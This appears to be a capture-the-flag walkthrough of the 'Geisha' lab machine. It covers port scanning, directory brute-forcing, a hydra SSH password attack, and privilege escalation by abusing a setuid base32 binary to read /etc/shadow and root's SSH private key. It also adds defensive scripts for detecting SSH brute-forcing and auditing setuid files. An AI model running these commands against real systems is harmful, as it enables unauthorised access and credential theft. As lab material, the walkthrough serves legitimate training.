# Geisha

## Nmap

```
sudo nmap 192.168.152.82 -p- -sS -sV

PORT     STATE    SERVICE       VERSION
21/tcp   open     ftp           vsftpd 3.0.3
22/tcp   open     ssh           OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp   open     http          Apache httpd 2.4.38 ((Debian))
7080/tcp open     ssl/empowerid LiteSpeed
7125/tcp open     http          nginx 1.17.10
8088/tcp open     http          LiteSpeed httpd
9198/tcp filtered unknown
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```

This one is a little tricky, as we have multiple web servers which all appear to land us on the same page:

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-eb2ebdece7212ce58bef0c5f1102e5f90521cb09%2Fimage.png?alt=media)

I put all the web server ports and addresses into a text file called list.txt and used `dirsearch.py` to run through each target.

```
python3 dirsearch.py -l list.txt -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 60 --full-url
```

After some time we get an interesting hit on port 7125.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-b26076e2728900ba46b3c20adf3c5f0d49748b13%2Fimage.png?alt=media)

I browsed to the URL and downloaded passwd.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-8fbbb5eb59429616f7a4a2735919fac6dfee043b%2Fimage.png?alt=media)

From this we know the user geisha exists on the system and can start brute-forcing that account. Running hydra against `SSH` we soon get a valid hit.

```
hydra -l geisha -P /usr/share/wordlists/rockyou.txt ssh://192.168.152.82
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-06fc53db9f403cf6f63aac02c64fd4ca5a6af98e%2Fimage.png?alt=media)

We now have `SSH` access as the user.
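The hydra run above leaves a very recognisable trail in the sshd log, and the simplest way a defender catches it is to count failed logins per source address. The following is an added example, not part of the original writeup: a POSIX shell function that scans an sshd log for `Failed password` events and reports every source at or above a threshold. It is run here against a constructed sample log; the addresses, timestamps and PIDs are made up for the demo and are not from the target machine.

```shell
#!/bin/sh
# Added example (not from the original writeup): report source addresses
# that generate repeated sshd "Failed password" events, the footprint a
# password-guessing run leaves in auth.log / the journal.
# Usage: ssh_bruteforce_sources LOGFILE [THRESHOLD]
ssh_bruteforce_sources() {
    logfile="$1"
    threshold="${2:-10}"
    # Count "Failed password" lines per source address (the field after
    # "from") and print "<count> <ip>" for every address at or above the
    # threshold, noisiest first.
    awk -v thr="$threshold" '
        /sshd\[[0-9]+\]: Failed password/ {
            for (i = 1; i <= NF; i++) if ($i == "from") { ip = $(i + 1); n[ip]++ }
        }
        END { for (ip in n) if (n[ip] >= thr) print n[ip], ip }
    ' "$logfile" | sort -rn
}

# Constructed sample log (not from the target): one source hammering the
# geisha account plus one legitimate user who mistyped once.
make_sample_log() {
    out="$1"
    : > "$out"
    i=1
    while [ "$i" -le 12 ]; do
        echo "May 14 10:02:$(printf '%02d' "$i") geisha sshd[1$i]: Failed password for geisha from 192.0.2.10 port 5$i ssh2" >> "$out"
        i=$((i + 1))
    done
    echo "May 14 10:03:00 geisha sshd[200]: Failed password for invalid user admin from 192.0.2.10 port 600 ssh2" >> "$out"
    echo "May 14 10:05:00 geisha sshd[201]: Failed password for geisha from 198.51.100.7 port 700 ssh2" >> "$out"
    echo "May 14 10:05:05 geisha sshd[201]: Accepted password for geisha from 198.51.100.7 port 700 ssh2" >> "$out"
}

# Stand-alone demo: builds the sample log and prints "13 192.0.2.10".
sample="$(mktemp)"
make_sample_log "$sample"
ssh_bruteforce_sources "$sample" 10
rm -f "$sample"
```

With the threshold at 10 only the noisy source is reported; the single typo from 198.51.100.7 stays below it, which is the point of thresholding rather than alerting on every failure. On a real host the same logic applies to `/var/log/auth.log` or `journalctl -u ssh`, and fail2ban implements essentially this counter with an automatic block.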

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-cff0ed564838d161c4e470e8339c95703d78c529%2Fimage.png?alt=media)

As usual I transferred `linpeas` to the machine and, after running it, identified that the SUID bit is set on the base32 binary.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-8acac8e3391486e16cf2bae034c5436781db1a33%2Fimage.png?alt=media)

According to [GTFOBins](https://gtfobins.github.io/gtfobins/base32/) we can take advantage of this to perform privileged file reads.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-79c3439b70c75a7548a319c9a8ce327d64ca6969%2Fimage.png?alt=media)

Initially I used this to read the /etc/shadow file. However, I was unable to crack the password with rockyou.txt.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-af574567f0f78f9bac2882ec78f41750add4ab94%2Fimage.png?alt=media)
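The finding that makes this box fall over is a setuid bit on a binary that has no business carrying one, and the defensive counterpart is to audit setuid files against a known baseline and strip the bit from anything unexpected. The following is an added example, not part of the original writeup: shell functions that list setuid files under a tree, diff them against an allow-list, and remove the bit from the rest. The fixture directory, the baseline file and the `unexpected_suid` / `strip_unexpected_suid` names are constructed for the demo; on a real host you would run it against `/` as root, with a baseline captured from a clean install of the same distribution.

```shell
#!/bin/sh
# Added example (not from the original writeup): find setuid files that are
# not on an allow-list baseline and strip the bit from them, so a stray
# setuid base32 is caught by the owner before a linpeas run catches it.
# Usage: unexpected_suid DIR BASELINE
unexpected_suid() {
    dir="$1"
    baseline="$2"
    sorted="$(mktemp)"
    sort "$baseline" > "$sorted"
    # -perm -4000 matches every file with the setuid bit set; comm -13 keeps
    # only the lines present in the audit output but absent from the baseline.
    find "$dir" -type f -perm -4000 2>/dev/null | sort | comm -13 "$sorted" -
    rm -f "$sorted"
}

# Remediation: drop the setuid bit from every file the audit flagged.
# Usage: strip_unexpected_suid DIR BASELINE
strip_unexpected_suid() {
    unexpected_suid "$1" "$2" | while IFS= read -r f; do
        chmod u-s "$f"
    done
}

# Constructed fixture (not the target machine): a fake bin directory with an
# expected setuid passwd, an unexpected setuid base32, and a plain cat.
make_fixture() {
    root="$1"
    mkdir -p "$root/usr/bin"
    for b in passwd base32 cat; do : > "$root/usr/bin/$b"; done
    chmod u+s "$root/usr/bin/passwd" "$root/usr/bin/base32"
    printf '%s\n' "$root/usr/bin/passwd" > "$root/baseline.txt"
}

# Stand-alone demo: prints the unexpected entry, then removes its setuid bit.
fixture="$(mktemp -d)"
make_fixture "$fixture"
unexpected_suid "$fixture" "$fixture/baseline.txt"
strip_unexpected_suid "$fixture" "$fixture/baseline.txt"
rm -rf "$fixture"
```

The baseline is what makes this usable: every distribution ships a handful of legitimate setuid binaries (passwd, sudo, mount and friends), so an audit that simply lists all of them produces noise, while a diff against a recorded good state produces exactly the one line that matters.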

Now we could use this to read the proof.txt flag, but we are not really done until we gain a root shell. I decided to take a stab at the root account having an id\_rsa key.

```
/usr/bin/base32 /root/.ssh/id_rsa | base32 --decode
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a08362133211a3ecb190bb4e88a4bb5e6a519d63%2Fimage.png?alt=media)

I then transferred the key over to my attacking machine and used `chmod` to set appropriate permissions.

```
chmod 600 id_rsa
```

I then used the id\_rsa key to connect as root over SSH.

```
ssh -i id_rsa root@192.168.152.82
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a8cf541d870a049772cbfd937e6eec7a0d63ca28%2Fimage.png?alt=media)

